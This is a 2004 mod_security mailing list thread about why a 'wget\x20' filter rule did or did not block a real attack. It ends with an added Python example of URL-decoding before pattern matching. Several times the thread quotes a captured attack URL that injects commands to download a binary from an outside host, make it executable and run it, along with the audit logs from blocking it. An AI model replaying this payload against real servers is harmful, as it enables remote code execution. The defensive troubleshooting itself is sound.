Thread: RE: [mod-security-users] Problem with snort rules
From: L. C. L. <CLuther@Xybernaut.com> - 2004-02-04 19:53:41
Do any of the other SecFilter filters work? And a silly question, is your filtering actually turned on (SecFilterEngine On)?

When I use the URL against one of my internal web servers (Apache Linux), I receive the following error:

>>>>>>>>>>
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, xs...@xy... and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.
<<<<<<<<<<

And when I check the logs, I see the following (IP addresses and names obfuscated):

>>>>>>>>>>
========================================
Request: x.x.x.x - - [04/Feb/2004:14:48:25 -0500] "GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541
Handler: (null)
----------------------------------------
GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; brip1; .NET CLR 1.1.4322)
Host: mysecret
Connection: Keep-Alive
mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Content-Length: 541
Connection: close
Content-Type: text/html; charset=iso-8859-1
<<<<<<<<<<

So it appears that my 'SecFilter "wget\x20"' is working.

- Christopher

-----Original Message-----
From: Danny Shurett [mailto:dsh...@al...]
Sent: Wednesday, February 04, 2004 2:20 PM
To: mod...@li...
Subject: [mod-security-users] Problem with snort rules

I am working on getting my filters configured for a number of webservers. I used a few filters I found in the snort filters that were converted. However, upon further investigation, it didn't yield what I was looking for. Here is the one I think should be tripped:

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

Here is a real URL (slightly modified) that was used to attack a server.

http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi

I would have expected the wget filter above to block it. Can anyone help me understand why the filter above doesn't block wget? Am I missing the point? Please be gentle. Thanks.

-------------------------------------------------------
The SF.Net email is sponsored by EclipseCon 2004
Premiere Conference on Open Tools Development and Integration
See the breadth of Eclipse activity. February 3-5 in Anaheim, CA.
http://www.eclipsecon.org/osdn
_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users
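An added illustration, not code from the thread or from mod_security itself, of why the rule fires although the request only ever contains "wget%20": mod_security URL-decodes the request before applying SecFilter patterns, so the regex escape \x20 matches the decoded space, while the same pattern applied to the raw, still-encoded line finds nothing. The request line (with hostnames replaced by example.invalid) and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed request line modelled on the one in the thread. Hostnames are
# replaced with example.invalid; this is not a real captured request.
SAMPLE_REQUEST = (
    "GET /?basepath=http://example.invalid/x.gif?&cmd=cd%20/tmp;"
    "wget%20http://example.invalid/cgi;chmod%20711%20cgi;./cgi HTTP/1.1"
)

# The converted Snort rule from the thread. SecFilter patterns are regular
# expressions, so \x20 is a literal space, not the three characters "%20".
WGET_RULE = r"wget\x20"


def normalize_request(request_line: str) -> str:
    """URL-decode the request line once.

    This is the step mod_security performs before applying SecFilter
    patterns (its normalisation also does more, such as path cleanup, but
    percent-decoding is the part that matters for this rule)."""
    return unquote(request_line)


def secfilter_match(pattern: str, request_line: str, normalize: bool = True):
    """Emulate a SecFilter check against THE_REQUEST.

    Returns the matched text, or None. With normalize=True the pattern is
    applied to the decoded line, which is how mod_security matched the
    "wget\\x20" rule against a request that only contained "wget%20".
    With normalize=False the raw line is tested instead, which is why
    grepping the raw access log for the same pattern finds nothing."""
    subject = normalize_request(request_line) if normalize else request_line
    m = re.search(pattern, subject)
    return m.group(0) if m else None


if __name__ == "__main__":
    # Constructed demonstration: raw line does not match, decoded line does.
    print("raw    :", secfilter_match(WGET_RULE, SAMPLE_REQUEST, normalize=False))
    print("decoded:", secfilter_match(WGET_RULE, SAMPLE_REQUEST))
```

The same check explains the thread's log: the audit entry prints the request as received (wget%20), yet the match is reported on the decoded form.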
From: Danny S. <dsh...@al...> - 2004-02-04 20:03:23
Yes, SecFilters are working. If I append a /bin/ps error on the end of it, I get an error. Log file is also being written to.

On 2/4/04 2:53 PM, "L. Christopher Luther" <CLuther@Xybernaut.com> wrote:

> Do any of the other SecFilter filters work? And a silly question, is your
> filtering actually turned on (SecFilterEngine On)?
>
> When I use the URL against one of my internal web servers (Apache Linux), I
> receive the following error:
>
> >>>>>>>>>>
> Internal Server Error
> The server encountered an internal error or misconfiguration and was unable
> to complete your request.
>
> Please contact the server administrator, xs...@xy... and inform
> them of the time the error occurred, and anything you might have done that
> may have caused the error.
>
> More information about this error may be available in the server error log.
> <<<<<<<<<<
>
> And when I check the logs, I see the following (IP addresses and names
> obfuscated):
>
> >>>>>>>>>>
> ========================================
> Request: x.x.x.x - - [04/Feb/2004:14:48:25 -0500] "GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541
> Handler: (null)
> ----------------------------------------
> GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; brip1; .NET CLR 1.1.4322)
> Host: mysecret
> Connection: Keep-Alive
> mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
> mod_security-action: 500
>
> HTTP/1.1 500 Internal Server Error
> Content-Length: 541
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> <<<<<<<<<<
>
> So it appears that my 'SecFilter "wget\x20"' is working.
>
> - Christopher